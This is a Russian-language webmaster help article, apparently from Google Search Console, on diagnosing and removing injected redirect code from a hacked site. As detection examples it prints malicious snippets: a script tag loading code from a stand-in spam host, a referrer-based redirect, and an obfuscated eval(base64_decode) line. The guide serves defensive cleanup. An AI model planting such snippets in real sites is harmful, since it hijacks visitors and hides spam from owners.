Тип взлома: внедрение кода

Что значит, если в Google Search Console для страниц отображается статус "Внедрение кода"?

Это означает, что хакер взломал ваш сайт и перенаправляет посетителей на ресурс со спамом. Иногда хакеры настраивают переадресацию только для пользователей из определенного региона, с заданных исходных сайтов или устройств (например, мобильных телефонов). Хакер мог внедрить вредоносный код на вашем сайте непосредственно в HTML-файлы (например, настроив переадресацию с помощью JavaScript) или в файлы, генерирующие страницы сайта (например, в PHP-файлы). Также хакер мог настроить переадресацию, изменив файлы настроек сервера, с помощью которых администраторы обычно настраивают переадресацию для отдельных страниц или каталогов на сайте. Например, на сервере Apache такие настройки хранятся в файлах .htaccess и httpd.conf. Если вы не знаете, как проверить файлы настроек сервера, воспользуйтесь рекомендациями шага 2.

Оценить масштаб внедрения спама можно на шаге 5 процедуры по восстановлению сайтов, взломанных для распространения спама.

Как расследовать случаи переадресации?

Прежде всего, ни в коем случае не открывайте страницы своего сайта в браузере. Хакеры часто настраивают избирательную переадресацию пользователей в зависимости от следующих факторов:

  • местонахождения (обычно определяется по IP-адресу);
  • страницы, с которой пользователь перешел на сайт (например, со страницы результатов поиска);
  • сочетания ОС и браузера (например, пользователи мобильных устройств или менее защищенных браузеров).

Для проверки переадресации используйте следующие инструменты:

  • Use cURL or Wget to fetch a page:
    These freely available tools let you view the source of the page as seen by a search engine, and have the flexibility to include referrer or user-agent information. By serving spammy content only to users with specific user-agents or referrers, the hacker can target more "real people" and can better avoid detection from site owners and anti-hacking algorithms used by search engines. (Your site will need to be online to use these tools.) For example:
    $curl -v --referer "http://www.google.com/search?q=page" --user-agent "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.112 Safari/534.30" http://www.example.com/page.html
  • Индикатором того, что у сервера изменен файл настроек, могут служить следующие заголовки при загрузке страниц:

    ...
    < HTTP/1.1 301 Moved Permanently
    < Date: Sun, 24 Feb 2013 21:06:45 GMT
    < Server: Apache
    < Location: http://<spam-site>/index.html
    < Content-Length: 253
    …
    

    Также вы можете увидеть внедренный код при просмотре HTML-кода страницы.

    • Код в JavaScript или на другом скриптовом языке, который вызывает и запускает скрипты с опасного сайта: <script type='text/javascript' src='http://spam-site/js/x55.js'></script>
    • Скрипт, который перенаправляет пользователей на сайт со спамом:
      
      <script>
      if (document.referrer.match(/google\.com/)) { window.location("http://spam-site/"); } </script>
    • Замаскированный код для показа спама:
      eval(base64_decode("d2luZG93LmxvY2F0aW9uPScvL2dvb2dsZS5jb20nOw=="));

    Проверьте все подозрительные участки кода на сайте. Чтобы найти код на JavaScript, используйте запросы "script", "eval", "unescape" и т. д.

    Как очистить сайт от внедренного кода?

    Завершив подготовку, выполните шаг 7 процедуры по восстановлению взломанных сайтов. Например, вы можете заменить пораженные файлы надежными резервными или удалить вредоносный код с каждой страницы, а также все связанные с ним скрипты и файлы. Если вы при этом будете редактировать файлы настроек сервера, перезагрузите его, чтобы применить изменения.

    Обратите внимание, что удаление внедренного кода не исправляет исходную уязвимость, которая позволила хакеру взломать ваш сайт. Если не устранить ее, злоумышленники могут снова проникнуть на ваш сайт. Рекомендуем принять меры, чтобы обезопасить сайт. Например, нелишним будет полностью обновить используемое на нем ПО. Подробнее об удалении с сайта вредоносного ПО различных типов читайте в разделе "Оцените масштаб изменений в файловой системе" шага 5, на котором выявляется уровень внедрения спама.

    Эта информация оказалась полезной?
    Как можно улучшить эту статью?